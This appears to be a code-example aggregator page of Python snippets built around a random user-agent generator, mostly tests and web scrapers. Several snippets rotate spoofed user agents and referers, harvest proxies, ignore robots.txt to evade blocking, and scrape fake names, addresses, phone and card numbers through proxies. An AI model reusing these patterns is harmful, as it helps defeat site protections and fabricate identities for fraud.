Beispiel #1
0
    def test_navigator_option(self):
        """Each generated UA must mention the navigator it was asked for."""
        for _ in range(100):
            for browser in ('firefox', 'chrome'):
                agent = generate_user_agent(navigator=browser)
                self.assertIn(browser, agent.lower())
Beispiel #2
0
 def test_platform_option_tuple(self):
     """Tuples of platform names must be accepted without raising."""
     platform_choices = (
         ('win', 'linux'),
         ('win', 'linux', 'mac'),
         ('win',),
         ('linux',),
         ('mac',),
     )
     for _ in range(100):
         for choice in platform_choices:
             generate_user_agent(platform=choice)
Beispiel #3
0
def test_device_type_smartphone_chrome():
    """Chrome smartphone UAs carry the Mobile token; tablet UAs do not."""
    for _ in range(50):
        smartphone_ua = generate_user_agent(device_type='smartphone',
                                            navigator='chrome')
        assert 'Mobile' in smartphone_ua
        tablet_ua = generate_user_agent(device_type='tablet',
                                        navigator='chrome')
        assert 'Mobile' not in tablet_ua
Beispiel #4
0
def test_platform_option_tuple():
    """The os option must accept tuples of platform names."""
    os_choices = [
        ('win', 'linux'),
        ('win', 'linux', 'mac'),
        ('win',),
        ('linux',),
        ('mac',),
    ]
    for _ in range(50):
        for choice in os_choices:
            generate_user_agent(os=choice)
Beispiel #5
0
    def test_platform_navigator_option(self):
        """Combined platform+navigator constraints must both appear in the UA."""
        for _ in range(100):
            for browser in ('firefox', 'chrome'):
                lowered = generate_user_agent(platform='win',
                                              navigator=browser).lower()
                self.assertIn(browser, lowered)
                self.assertIn('windows', lowered)
Beispiel #6
0
def test_platform_option():
    """The generated UA must mention the requested operating system."""
    expected_tokens = {'linux': 'linux', 'win': 'windows', 'mac': 'mac'}
    for _ in range(50):
        for os_name, token in expected_tokens.items():
            assert token in generate_user_agent(os=os_name).lower()
Beispiel #7
0
def test_navigator_option():
    """The generated UA must identify the requested navigator."""
    for _ in range(50):
        assert 'firefox' in generate_user_agent(navigator='firefox').lower()
        assert 'chrome' in generate_user_agent(navigator='chrome').lower()
        # IE is identified either by the MSIE token or by the rv:11 marker
        ie_agent = generate_user_agent(navigator='ie').lower()
        assert 'msie' in ie_agent or 'rv:11' in ie_agent
Beispiel #8
0
    def test_platform_option(self):
        """The UA mentions its platform; an invalid platform value raises."""
        for _ in range(100):
            for platform_name, token in (('linux', 'linux'),
                                         ('win', 'windows'),
                                         ('mac', 'mac')):
                agent = generate_user_agent(platform=platform_name)
                self.assertIn(token, agent.lower())

            with self.assertRaises(UserAgentRuntimeError):
                generate_user_agent(platform=11)
def getarticle(readfile):
    ''' get the article and save it in a different file '''
    try:
        fileopen = open(readfile)
    except IOError:
        print "file " + readfile + " not in the location specified"
        return

    i = 1
    for line in fileopen:
        try:
        	ua = generate_user_agent()
        	head = ua.encode('ascii', 'ignore')
        	headers = {'useragent':head}

        	print "reading article :"
        	print line
        	html = requests.get(line, headers = headers).text
        	tex = fulltext(html)
        	writefile = "201604"+str(j)+"_"+str(i)+".txt"
        	with io.open(writefile, encoding='utf-8', mode='w+') as ns:
        		strng = ' '.join(tex.split())
        		ns.write(strng)
        		ns.close()
        	i = i + 1       	
       	except:
       	    pass
Beispiel #10
0
def get_proxies(proxy_type, ip_set, start_page, end_page):
    """extract proxies from page source code, store them in redis

    Args:
        proxy_type (str): base url for proxy type, like the global variables CHINA and OTHER
        ip_set (str): which set should the ips be stored in redis
        start_page (int):  which page to start crawling
        end_page (int): which page to stop crawling
    """
    try:
        conn = get_connection()
    except Exception:
        print 'Error while connecting to redis'
        return
    # NOTE(review): proxies and curr_proxy are never used below -- confirm leftovers
    proxies, curr_proxy =[], None
    for page in xrange(start_page, end_page+1):
        # throttle: pause on every second page to avoid being blocked
        if page % 2 == 0:
            time.sleep(20)
        # get page source code, with browser-like headers to look legitimate
        headers = {'user-agent': generate_user_agent(), 'referer': 'http://www.xicidaili.com/'}
        text = requests.get(proxy_type+str(page), headers = headers).text
        # extract ips from source code
        soup = BeautifulSoup(text, 'lxml')
        for tr in soup.find_all('tr')[1:]:
            tds = tr.find_all('td')
            # (disabled) filter that kept only proxies located in the USA
            #if u'美国' in tds[3].text:
            proxy = tds[1].text+':'+tds[2].text
            # only keep proxies that can actually reach the target site
            if is_valid('https://www.amazon.com/', proxy):
                conn.sadd(ip_set, proxy)
                print '%s added to ip set %s' %(proxy, ip_set)
Beispiel #11
0
def getBaiduDictCate():
    """Fetch the category tree of the Baidu dictionary store.

    There are three category levels; level-3 categories are folded into their
    level-2 parent because they are few and very fine-grained.

    :return: two dicts -- the first maps top-level category IDs to their
        names, the second maps each top-level category to its sub-categories.
    """
    bigCateDict = {}
    smallCateDict ={}
    initPageURL = r'https://shurufa.baidu.com/dict'
    cateBaseURL = r'https://shurufa.baidu.com/dict_list?cid='

    # guard against 502 errors: send browser-like headers
    userAgent = generate_user_agent()
    referrer = 'http://shurufa.baidu.com/dict.html'
    headers = {}
    headers['User-Agent'] = userAgent
    headers['Referer'] = referrer

    # fetch the top-level category page
    try:
        request = urllib2.Request(url=initPageURL, headers=headers)
        response = urllib2.urlopen(request)
        data = response.read()
    except urllib2.HTTPError, e:
        print 'Error while getting the big category,error code:',e.code
        sys.exit()
    # NOTE(review): snippet appears truncated here -- the parsing of `data`
    # and the construction of the two returned dicts are not visible.
Beispiel #12
0
def get_address(proxy):
    """fetch american address from https://fakena.me/random-real-address/

    Args:
        proxy (str): proxy to visit the target site, ip:port

    Returns:
        format_addr (str): american address in the form of
            "address_line#city#state#zip", or '' when the page yields nothing
    """
    ignore_warnings()
    url = r'https://fakena.me/random-real-address/'
    referer = r'https://fakena.me'
    header = {'user-agent' : generate_user_agent() , 'referer':referer }
    # only an http proxy is configured; https traffic goes direct
    curr_proxy ={
    'http': 'http://%s'%proxy
    }

    text = requests.get(url, headers = header, proxies = curr_proxy).text
    # the site embeds the address as <strong>line1<br>city, state zip</strong>
    pattern = re.compile('<strong>(.+)<br>(.+)</strong>')
    result = re.findall(pattern, text)
    if result: # sometimes the result is empty
        print result[0][0], result[0][1]
        address_line = result[0][0]
        city, state_zip = result[0][1].split(',')
        # NOTE(review): 'zip' shadows the builtin of the same name
        state, zip = state_zip.split()
        format_addr = address_line+'#'+city+'#'+state+'#'+zip
        return format_addr
    else:
        return ''
def getheadline(companyName, day, firstlink, prevdatelink):
    '''
    scrap headlines from finance.yahoo.com

    :param companyName: ticker/name used in the search url
    :param day: day-of-month appended to the fixed 2016-04 date
    :param firstlink: overwritten with the first link found; returned to caller
    :param prevdatelink: first link of the previous run; scraping stops when
        it is seen again (i.e. no new headlines beyond that point)
    :return: the first link written for this day
    '''
    #date = '2016-02-'+str(day)
    searchUrl = 'http://finance.yahoo.com/q/h?s='+companyName+'&t=2016-04-'+str(day)
    #use fake useragent
    #ua = generate_user_agent()

    head = generate_user_agent().encode('ascii', 'ignore')
    # NOTE(review): requests sends this key verbatim; the standard header is
    # 'User-Agent' -- confirm whether this ever worked as intended.
    headers = {'useragent':head}
    response = requests.get(searchUrl, headers=headers)

    soup = BeautifulSoup(response.content, 'html.parser')
    links = soup.select('div.yfi_quote_headline ul > li > a')
    #write the search results in file, a new file for each day
    filename = 'links'+str(day)+'.txt'

    with io.open(filename, encoding='utf-8', mode='w+') as ns:
        count = 1
        for link in links:
            nextlinks = link.get('href')+'\n'
            if count == 1:
                ns.write(nextlinks)
                firstlink = nextlinks
            elif prevdatelink == nextlinks:
                print "All uniques headlines scraped"
                break
            else:
                ns.write(nextlinks)
            count += 1
        # NOTE(review): redundant -- the with-statement closes the file
        ns.close()
    return firstlink
def getCategoryPages(caterotyID,downloadDIR):
    """Determine a category's total page count from its first page, so every
    page can be queued in PAGE_QUEUE for the worker threads to download.

    :param caterotyID: ID of the dictionary category to download (builds the url)
    :param downloadDIR: directory where the downloaded dictionaries are stored
    :return:
    """
    global CATEID, DOWNLOAD_DIR, PAGE_BASE_URL, THREAD_LOCK
    CATEID = caterotyID
    DOWNLOAD_DIR = downloadDIR
    PAGE_BASE_URL = 'https://shurufa.baidu.com/dict_list?cid=%s' % CATEID
    pagePattern = re.compile(r'page=(\d+)#page')    # regex matching links to the other pages in the page source

    # guard against 502 errors: send browser-like headers
    userAgent = generate_user_agent()
    referrer = 'http://shurufa.baidu.com/dict.html'
    headers = {}
    headers['User-Agent'] = userAgent
    headers['Referer'] = referrer

    # find the highest page number; the pages are then 1..max
    # the server may answer 502/500, so retry up to maxTry times
    # NOTE(review): the original comment said 5 attempts but the code uses 8
    maxTry = 8
    data = None
    for i in xrange(maxTry):
        try:
            request = urllib2.Request(url=PAGE_BASE_URL, headers=headers)
            response = urllib2.urlopen(request)
            data = response.read()
            break
        except urllib2.HTTPError, e:
            if i == maxTry-1:
                # last attempt failed: record the error in the download log
                with io.open(DOWNLOAD_LOG.decode('utf8'), mode = 'a', encoding = 'utf8') as f:
                    f.write((str(e.code)+' error while parsing url '+PAGE_BASE_URL+'\n').decode('utf8'))
        except:
Beispiel #15
0
    def on_blocked(self):
        """Handle being blocked: rotate the UA, back off, run the hook command."""
        ScholarConf.USER_AGENT = generate_user_agent()  # fresh identity
        self.timeout *= 2.0  # exponential backoff on every block

        if self.blocked_cmd is not None:
            exit_code, cmd_output = getstatusoutput(self.blocked_cmd)
            if exit_code != 0:
                self.status.error(cmd_output)
Beispiel #16
0
    def send_query(self, query):
        """Count outgoing queries and periodically rotate the user agent."""
        # TODO: Randomize query, i.e. remove/change unused arguments to vary query signature
        self.queries_sent += 1
        rotation_due = self.queries_sent % self.queries_change == 0
        if rotation_due:
            # pick a new random rotation interval and a new identity
            self.queries_change = randint(3, 13)
            ScholarConf.USER_AGENT = generate_user_agent()

        return super(BibDLQuerier, self).send_query(query)
Beispiel #17
0
  def invoke(self, url):
    """Fetch *url* and hand each listed book element to parse_book."""
    response = requests.get(url, headers={'User-Agent': generate_user_agent()})

    soup = BeautifulSoup(response.text, 'lxml') #from_encoding="gb2312")
    for book in soup.select("div.book_list > ul > li"):
      self.parse_book(book)
Beispiel #18
0
def get_request(url):
    """
    Fetch *url* with a randomized User-Agent header.

    Args:
        url (str): address to request.

    Returns:
        requests.Response: the raw response object.
    """
    headers = {"User-Agent": generate_user_agent()}
    # BUG FIX: headers must be passed as a keyword argument -- the second
    # positional parameter of requests.get() is `params`, so the original
    # call sent the UA dict as query parameters and no User-Agent at all.
    response = requests.get(url, headers=headers)
    return response
def download_images(link_file_path, download_dir, log_dir):
    """download images whose links are in the link file

    Args:
        link_file_path (str): path of file containing links of images
        download_dir (str): directory to store the downloaded images
        log_dir (str): directory where the download log file is written

    Returns:
        None
    """
    print('Start downloading with link file {0}..........'.format(link_file_path))
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    # the link file's basename doubles as the keyword / output sub-directory
    main_keyword = link_file_path.split('/')[-1]
    log_file = log_dir + 'download_selenium_{0}.log'.format(main_keyword)
    logging.basicConfig(level=logging.DEBUG, filename=log_file, filemode="a+", format="%(asctime)-15s %(levelname)-8s  %(message)s")
    img_dir = download_dir + main_keyword + '/'
    count = 0
    headers = {}
    if not os.path.exists(img_dir):
        os.makedirs(img_dir)
    # start to download images
    with open(link_file_path, 'r') as rf:
        for link in rf:
            try:
                # use the link's own origin as referer to look like a browser
                o = urlparse(link)
                ref = o.scheme + '://' + o.hostname
                #ref = 'https://www.google.com'
                ua = generate_user_agent()
                headers['User-Agent'] = ua
                headers['referer'] = ref
                print('\n{0}\n{1}\n{2}'.format(link.strip(), ref, ua))
                req = urllib.request.Request(link.strip(), headers = headers)
                response = urllib.request.urlopen(req)
                data = response.read()
                # images are saved by running index, always with .jpg extension
                file_path = img_dir + '{0}.jpg'.format(count)
                with open(file_path,'wb') as wf:
                    wf.write(data)
                print('Process-{0} download image {1}/{2}.jpg'.format(main_keyword, main_keyword, count))
                count += 1
                # brief pause every 10 images to avoid hammering the host
                if count % 10 == 0:
                    print('Process-{0} is sleeping'.format(main_keyword))
                    time.sleep(5)

            # NOTE(review): HTTPError subclasses URLError, so this first branch
            # also catches HTTP errors and the next branch is unreachable
            except urllib.error.URLError as e:
                print('URLError')
                logging.error('URLError while downloading image {0}reason:{1}'.format(link, e.reason))
                continue
            except urllib.error.HTTPError as e:
                print('HTTPError')
                logging.error('HTTPError while downloading image {0}http code {1}, reason:{2}'.format(link, e.code, e.reason))
                continue
            except Exception as e:
                print('Unexpected Error')
                logging.error('Unexpeted error while downloading image {0}error type:{1}, args:{2}'.format(link, type(e), e.args))
                continue
def download_with_time_limit(link_file_path, download_dir, log_dir, limit_time = 10):
    """Download images listed in a link file, aborting any single download
    that exceeds *limit_time* seconds via a SIGALRM handler.

    Args:
        link_file_path (str): path of the file containing image links
        download_dir (str): directory to store the downloaded images
        log_dir (str): directory where the download log file is written
        limit_time (int): per-image timeout in seconds
    """
    main_keyword = link_file_path.split('/')[-1]
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    log_file = log_dir + 'download_selenium_{0}.log'.format(main_keyword)
    logging.basicConfig(level = logging.DEBUG, filename = log_file, filemode = "a+", format = "%(asctime)-15s %(levelname)-8s  %(message)s")
    img_dir = download_dir + main_keyword + '/'
    count = 0
    headers = {}
    if not os.path.exists(img_dir):
        os.makedirs(img_dir)
    # `handler` (module-level) raises TimeLimitError when the alarm fires
    signal.signal(signal.SIGALRM, handler)
    with open(link_file_path, 'r') as rf:
        for link in rf:
            try:
                # use the link's own origin as referer to look like a browser
                ref = 'https://www.google.com'
                o = urlparse(link)
                ref = o.scheme + '://' + o.hostname
                ua = generate_user_agent()
                headers['User-Agent'] = ua
                headers['referer'] = ref

                # limit the time of downloading a image
                try:
                    signal.alarm(limit_time) # set a timeout(alarm)
                    req = urllib.request.Request(link.strip(), headers = headers)
                    response = urllib.request.urlopen(req)
                    data = response.read()
                except TimeLimitError as e:
                    print('TimeLimitError: process-{0} encounters {1}'.format(main_keyword, e.value))
                    logging.error('TimeLimitError while downloading image{0}'.format(link))
                    continue
                finally:
                    signal.alarm(0) # disable the alarm

                file_path = img_dir + '{0}.jpg'.format(count)
                with open(file_path,'wb') as wf:
                    wf.write(data)
                print('Process-{0} download image {1}/{2}.jpg'.format(main_keyword, main_keyword, count))
                count += 1
                # brief pause every 10 images to avoid hammering the host
                if count % 10 == 0:
                    print('Process-{0} is sleeping'.format(main_keyword))
                    time.sleep(5)
            except urllib.error.HTTPError as e:
                print('HTTPError')
                logging.error('HTTPError while downloading image {0}http code {1}, reason:{2}'.format(link, e.code, e.reason))
                continue
            except urllib.error.URLError as e:
                print('URLError')
                logging.error('URLError while downloading image {0}reason:{1}'.format(link, e.reason))
                continue
            except Exception as e:
                print('Unexpected Error')
                logging.error('Unexpeted error while downloading image {0}error type:{1}, args:{2}'.format(link, type(e), e.args))
                continue
def download_images(main_keyword, supplemented_keywords, download_dir):
    """download images with one main keyword and multiple supplemented keywords

    Args:
        main_keyword (str): main keyword
        supplemented_keywords (list[str]): list of supplemented keywords
        download_dir (str): directory under which a per-keyword folder is made

    Returns:
        None
    """
    image_links = set()
    print('Process {0} Main keyword: {1}'.format(os.getpid(), main_keyword))

    # create a directory for a main keyword
    img_dir =  download_dir + main_keyword + '/'
    if not os.path.exists(img_dir):
        os.makedirs(img_dir)

    # collect image links from a Google image search per supplemented keyword
    for j in range(len(supplemented_keywords)):
        print('Process {0} supplemented keyword: {1}'.format(os.getpid(), supplemented_keywords[j]))
        search_query = (main_keyword + ' ' + supplemented_keywords[j]).replace(' ','%20')
        # url = 'https://www.google.com/search?q=' + search_query + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
        url = 'https://www.google.com/search?q=' + search_query + '&source=lnms&tbm=isch'
        image_links = image_links.union(parse_page(url))
        print('Process {0} get {1} links so far'.format(os.getpid(), len(image_links)))
        time.sleep(2)
    print ("Process {0} get totally {1} links".format(os.getpid(), len(image_links)))

    print ("Start downloading...")
    count = 1
    for link in image_links:
        try:
            req = urllib.request.Request(link, headers = {"User-Agent": generate_user_agent()})
            response = urllib.request.urlopen(req)
            data = response.read()
            # images are saved by running index, always with .jpg extension
            file_path = img_dir + '{0}.jpg'.format(count)
            with open(file_path,'wb') as wf:
                wf.write(data)
            print('Process {0} fininsh image {1}/{2}.jpg'.format(os.getpid(), main_keyword, count))
            count += 1
        except urllib.error.URLError as e:
            logging.error('URLError while downloading image {0}\nreason:{1}'.format(link, e.reason))
            continue
        except urllib.error.HTTPError as e:
            logging.error('HTTPError while downloading image {0}\nhttp code {1}, reason:{2}'.format(link, e.code, e.reason))
            continue
        except Exception as e:
            logging.error('Unexpeted error while downloading image {0}\nerror type:{1}, args:{2}'.format(link, type(e), e.args))
            continue

    # count starts at 1, so failures = total links - successful downloads
    print("Finish downloading, total {0} errors".format(len(image_links) - count))
Beispiel #22
0
def generate_profile(useragent="(default)"):
    """Return a FirefoxProfile honouring the requested useragent policy.

    "(default)" keeps the browser default, "(random)" picks a random
    mac/linux UA, anything else is used verbatim as the override.
    """
    profile = FirefoxProfile()
    choice = useragent.strip().lower()
    if choice == "(default)":
        status("Using the default useragent")
    elif choice == "(random)":
        random_useragent = generate_user_agent(os=('mac', 'linux'))
        # override makes Firefox report our randomized identity
        profile.set_preference("general.useragent.override", random_useragent)
        status("Using random useragent "+random_useragent)
    else:
        profile.set_preference("general.useragent.override", useragent)
        status("Using useragent "+useragent)
    return profile
Beispiel #23
0
def test_invalid_platform_option():
    """Invalid os values (wrong type or unknown name) must raise InvalidOption."""
    for bad_os in (11, 'dos', 'win,dos'):
        with pytest.raises(InvalidOption):
            generate_user_agent(os=bad_os)
Beispiel #24
0
def get_phone_visa():
    """fetch phone, visa from http://www.fakeaddressgenerator.com/World/us_address_generator

    :return: two '#'-joined strings: "name#phone" and "name#visa#expiry"
    """
    url = r'http://www.fakeaddressgenerator.com/World/us_address_generator'
    referer = r'http://www.fakeaddressgenerator.com/World'
    header = {'user-agent' : generate_user_agent() , 'referer':referer }
    text = requests.get(url, headers = header).text
    soup = BeautifulSoup(text, 'lxml')
    # the page exposes each generated field as an <input> value;
    # indices 0/9/11/13 are name/phone/visa/expiry respectively
    info = soup.find_all('input')
    """
    print 'name:',info[0]['value']
    print 'phone:',info[9]['value']
    print 'visa:',info[11]['value']
    print 'expires:',info[13]['value']
    """
    name_phone =  info[0]['value']+'#'+info[9]['value']
    name_visa = info[0]['value']+'#'+info[11]['value']+'#'+info[13]['value']
    print name_phone, name_visa
    return name_phone, name_visa
Beispiel #25
0
    def __init__(self, proxy):
        """init the webdriver by setting the proxy and user-agent

        Args:
            proxy (str): proxy in the form of ip:port
        """
        # set proxy
        ip, port = proxy.split(':')
        profile = webdriver.FirefoxProfile()
        profile.set_preference("network.proxy.type", 1)  # 1 = manual proxy config
        profile.set_preference("network.proxy.http", ip)
        # NOTE(review): port is still a str here; Firefox prefs usually take
        # an int for http_port -- confirm this works as intended.
        profile.set_preference("network.proxy.http_port", port)
        # set user_agent
        profile.set_preference("general.useragent.override", generate_user_agent())

        profile.update_preferences()
        self.driver = webdriver.Firefox(firefox_profile=profile)

        print 'current proxy: %s'%proxy
def download_page(url):
    """Return the raw content of the page at *url*, or None on failure.

    Args:
        url (str): url of the page

    Returns:
        str or None: stringified response body, or None if any error occurred.
    """
    try:
        headers = {
            'User-Agent': generate_user_agent(),
            'Referer': 'https://www.google.com',
        }
        req = urllib.request.Request(url, headers=headers)
        # context manager ensures the HTTP response is closed (the original
        # leaked it until garbage collection)
        with urllib.request.urlopen(req) as resp:
            return str(resp.read())
    except Exception:
        print('error while downloading page {0}'.format(url))
        logging.error('error while downloading page {0}'.format(url))
        return None
Beispiel #27
0
def is_valid(target_url, ip, referer):
    """Return True when *ip* can proxy a request to *target_url*.

    Args:
        target_url (str): url that needs to be visited through the proxy
        ip (str): proxy address in ip:port form
        referer (str): referer header value for the request

    Returns:
        bool: True if the proxied request succeeds within 6 seconds.
    """
    ignore_warnings()
    request_headers = {'user-agent': generate_user_agent(), 'referer': referer}
    proxy_map = {'http': 'http://%s' % ip}
    try:
        requests.get(target_url, headers=request_headers,
                     proxies=proxy_map, timeout=6)
    except Exception:
        return False
    return True
def downloadSingleCate(cateID, dirName, downloadLog, tryBest = True):
    """Download the dictionaries belonging to one category.

    :param cateID: category ID
    :param dirName: directory to download into
    :param downloadLog: log file recording files that failed to download
    :param tryBest: whether the maximum retry count was reached (controls logging)
    :return: None (False on HTTP failure)
    """
    pageBaseUrl = r'https://shurufa.baidu.com/dict_list?cid=%s' %cateID
    fileBaseUrl = r'https://shurufa.baidu.com/dict_innerid_download?innerid='

    pagePattern = re.compile(r'page=(\d+)#page')  # non-greedy match for urls of the other pages
    filePattern = re.compile(r'dict-name="(.*?)" dict-innerid="(\d+)"')   # non-greedy match for downloadable file names and ids

    visited = set()       # tracks which urls have already been visited
    downloaded = set()    # tracks which files have already been downloaded


    # guard against 502 errors: send browser-like headers
    userAgent = generate_user_agent()
    referrer = 'http://shurufa.baidu.com/dict.html'
    headers = {}
    headers['User-Agent'] = userAgent
    headers['Referer'] = referrer

    # find the highest page number; the pages are then 1..max
    try:
        request = urllib2.Request(url=pageBaseUrl, headers=headers)
        response = urllib2.urlopen(request)
        data = response.read()
    except urllib2.HTTPError, e:
        if tryBest:
            # out of retries: record the failure in the download log
            with io.open(downloadLog.decode('utf8'), mode = 'a', encoding = 'utf8') as f:
                f.write((str(e.code)+' error while parsing url '+pageBaseUrl+'\n').decode('utf8'))
        return False
def main():
    """Paginate through work.ua search results and persist vacancies to SQLite.

    Relies on module-level HOST, ROOT_PATH, cur, db, random_sleep() and
    save_info(), none of which are defined in this snippet.
    """
    page = 0

    while True:
        page += 1

        payload = {
            'ss': 1,
            'page': page,
        }

        # fresh random user agent for every listing page
        user_agent = generate_user_agent()
        headers = {
            'User-Agent': user_agent,
        }

        print(f'PAGE: {page}')
        response = requests.get(HOST + ROOT_PATH,
                                params=payload,
                                headers=headers)
        response.raise_for_status()
        random_sleep()

        html = response.text

        soup = BeautifulSoup(html, 'html.parser')

        class_ = 'card card-hover card-visited wordwrap job-link'
        cards = soup.find_all('div', class_=class_)
        if not cards:
            # some result cards carry an extra "js-hot-block" modifier class
            cards = soup.find_all('div', class_=class_ + ' js-hot-block')

        result = []
        if not cards:
            # no cards at all: we are past the last results page
            break

        for card in cards:
            tag_a = card.find('h2').find('a')
            title = tag_a.text
            href = tag_a['href']
            result.append([title, href])
            # fetch the individual vacancy page
            vac_response = requests.get(HOST + href, headers=headers)
            vac_html = vac_response.text
            vac_soup = BeautifulSoup(vac_html, 'html.parser')

            # vacancy id is the second-to-last path segment of the href
            workua_id = int(href.split('/')[-2])

            vacancy = vac_soup.find('h1', id='h1-name').text

            address = vac_soup.find(
                'p', class_='text-indent add-top-sm').text.strip()
            address = address.split('\n')[0]

            blocks = vac_soup.find_all(
                'p', class_='text-indent text-muted add-top-sm')
            for block in blocks:
                if block.find('a') != None:
                    company = block.find('a').find('b').text
                else:
                    if block.find('b') != None:
                        salary = block.find('b').text
                        # strip narrow/thin spaces used as digit separators
                        salary = salary.replace('\u202f', '')
                        salary = salary.replace('\u2009', '')
                if not 'salary' in locals():
                    salary = None

            # NOTE(review): 'company' (and 'salary' when blocks is empty) may
            # be unbound here if the page lacks the expected markup -- confirm.
            data = (workua_id, vacancy, company, address, salary)
            cur.execute('''INSERT INTO jobs VALUES (?, ?, ?, ?, ?)''', data)

            db.commit()

        save_info(result)

    db.close()
Beispiel #30
0
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
#     https://doc.scrapy.org/en/latest/topics/settings.html
#     https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#     https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from user_agent import generate_user_agent

BOT_NAME = 'HeZhiNews'

SPIDER_MODULES = ['HeZhiNews.spiders']
NEWSPIDER_MODULE = 'HeZhiNews.spiders'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
# A random Windows browser UA is generated once per process start.
USER_AGENT = generate_user_agent(os='win')

# Obey robots.txt rules
ROBOTSTXT_OBEY = False

# Configure maximum concurrent requests performed by Scrapy (default: 16)
CONCURRENT_REQUESTS = 8

# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
CONCURRENT_REQUESTS_PER_DOMAIN = 8
CONCURRENT_REQUESTS_PER_IP = 8
Beispiel #31
0
 def test_it(self):
     """A default call must yield a non-empty user agent string."""
     agent = generate_user_agent()
     self.assertTrue(len(agent) > 0)
Beispiel #32
0
 def test_platform_linux(self):
     """Linux user agents must begin with the X11 Mozilla prefix."""
     for _ in range(100):
         agent = generate_user_agent(platform='linux')
         self.assertTrue(agent.startswith('Mozilla/5.0 (X11;'))
Beispiel #33
0
import re
from bs4 import BeautifulSoup
from user_agent import generate_user_agent

# Web scraping details
lastFmUrl = "https://www.last.fm"
topArtistsUrl = "/user/kaktusas86/library/artists?date_preset=ALL_TIME&page=1"
# One random desktop (mac/linux) user agent, fixed at import time.
headers = {
    'User-Agent': generate_user_agent(device_type="desktop",
                                      os=('mac', 'linux'))
}


def fetchUrl(url, headers):
    """GET *url* with the given headers and return the parsed soup."""
    page = requests.get(url, timeout=60, headers=headers)
    soup = BeautifulSoup(page.content, 'html.parser')
    return soup


def fetchTopArtistsWithSoup():
    """Scrape the top-artists table from the last.fm library page.

    Uses the module-level lastFmUrl/topArtistsUrl/headers constants.
    """
    topArtistsSoup = fetchUrl(url=(lastFmUrl + topArtistsUrl), headers=headers)
    topArtistsHtml = topArtistsSoup.find(id="top-artists-section")
    # Loop through table rows reading basic info about artist
    for artistInfo in topArtistsHtml.find_all('tr'):
        try:
            #Parse basic info: rank, title and scrobble count
            rank = artistInfo.find('td', class_="chartlist-index")
            rank = " ".join(rank.string.split())
            name = artistInfo.find('td', class_="chartlist-name")
            href = name.find('a', class_="link-block-target").get('href')
            name = " ".join(name.text.split())
            # NOTE(review): snippet appears truncated -- the matching except
            # clause and the use of `scrobbles` are not visible here.
            scrobbles = artistInfo.find('td', class_="chartlist-countbar")
Beispiel #34
0
 def __init__(self, base_url):
     """Initialise the scraper with a random desktop mac/linux user agent."""
     super().__init__(base_url)
     ua = generate_user_agent(device_type="desktop", os=("mac", "linux"))
     self.headers = {"User-Agent": ua}
Beispiel #35
0
@file: jianshu.py
@time: 01/03/2018 20:44
"""

import requests
from bs4 import BeautifulSoup
from core import config, logger, db
from entities import Article
import user_agent

# Shared request headers; the User-Agent is randomized once at import time.
headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Accept': 'text/html, */*; q=0.01',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': user_agent.generate_user_agent(),
    'Accept-Encoding': 'gzip, deflate, sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8,ja;q=0.6'
}


class Config(object):
    """Typed view over the crawler configuration dict."""

    def __init__(self, cfg: dict):
        # 'seminars' and 'limit' are required keys; 'debug' defaults to True.
        self.seminars = cfg['seminars']
        self.limit = cfg['limit']
        self.debug = cfg.get('debug', True)


class Jianshu:
    # URL template: seminar id and page number are interpolated per request.
    _seminar_url = 'https://www.jianshu.com/c/%s?order_by=added_at&page=%d'
    # site root, used to build absolute links
    _jianshu = 'https://www.jianshu.com'
Beispiel #36
0
def page_scraper(links):
    """Scrape cruise detail pages and write the collected data to a file.

    Args:
        links (iterable[str]): urls of cruise pages to scrape.

    Side effects: prints progress, calls write_in_file() with the results.
    """
    print('Cruises Pages scrap process...')
    result = []
    for url in links:
        try:
            # fresh random desktop UA per page
            user_agent_ = {
                'User-Agent':
                generate_user_agent(device_type='desktop', os=('mac', 'linux'))
            }
            print('scrap url page ...' + url[-30:-1] + 'l')
            dict_result = {}
            ask = requests.get(url, headers=user_agent_)
            soup = BSoup(ask.content, 'html.parser')

            # Extract the cruise name
            name = soup.find('div',
                             class_='col-md-9 river-site-highlight').find(
                                 'h1').get_text().split('\n')[0]
            dict_result.update({'name': name})

            # Count the days of the route
            soup_iter = soup.find(
                'div', class_='panel-group accordion route').find_all(
                    'div', class_='panel panel-default')
            count_days = len(soup_iter)

            # Extract the itinerary (route cities)
            itineary = [
                soup_item.find('span', class_="route-city").text.replace(
                    ' ', '').replace('\n', '') for soup_item in soup_iter
            ]
            dict_result.update({'itineary': itineary})

            # Extract the list of departure date, ship and price entries
            soup_dayprice_iter = soup.find(
                'div',
                class_='panel-group accordion price accordeon-data-price'
            ).find_all('div',
                       class_='panel panel-default accordeon-panel-default')
            temp_list = []
            for soup_item in soup_dayprice_iter:
                tag_a = soup_item.find('a', class_='collapsed panel-title')
                date_ = tag_a.find('div', class_='price-date').find(
                    'span', class_='price-duration').get_text()
                ship_ = tag_a.find(
                    'div', class_='price-ship').find('span').get_text()
                price_ = tag_a.find('div', class_='price-ship').find(
                    'div', class_='pull-right').find(
                        'span',
                        class_='big-table-font').text.replace(' ', '').replace(
                            '\n', '').replace('€', '').replace('.', '')
                temp_list.append(
                    {date_converter(date_): {
                         'ship': ship_,
                         'price': price_
                     }})
            dict_result.update({'days': temp_list})
            result.append(dict_result)
        # NOTE(review): bare except silently swallows every failure (including
        # KeyboardInterrupt) -- consider narrowing to Exception.
        except:
            print('Page ' + url[-30:-1] + 'l' + 'Not load')
    write_in_file(result)
Beispiel #37
0
def main(platform, navigator, **kwargs):
    """Print 30 randomly generated user-agent strings.

    :param platform: platform name (or tuple of names) passed through to
        ``generate_user_agent``.
    :param navigator: browser name (or tuple of names) passed through to
        ``generate_user_agent``.
    :param kwargs: accepted for CLI compatibility; ignored.
    """
    for _ in range(30):
        agent = generate_user_agent(platform=platform, navigator=navigator)
        print(agent)
Beispiel #38
0
